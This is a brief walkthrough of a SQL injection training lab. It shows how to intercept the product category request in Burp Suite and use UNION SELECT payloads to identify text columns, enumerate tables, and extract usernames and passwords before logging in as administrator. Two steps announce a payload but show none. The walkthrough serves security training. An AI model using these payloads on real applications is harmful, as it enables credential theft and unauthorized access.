SQL injection attack, listing the database contents on non-Oracle databases

🛠️ Use Burp Suite to intercept and modify the request setting the product category filter.

📊 Determine the number of columns returned by the query and which ones contain text data. Verify that two columns contain text using this payload:

`'+UNION+SELECT+'abc','def'--`

🔍 Retrieve the list of tables in the database with this payload:

🔐 Find the table with user credentials, then retrieve column details using:

👤 Find columns for usernames and passwords. Retrieve them using:

`'+UNION+SELECT+username_abcdef,+password_abcdef+FROM+users_abcdef--`

🔑 Finally, locate the administrator's password and use it to log in!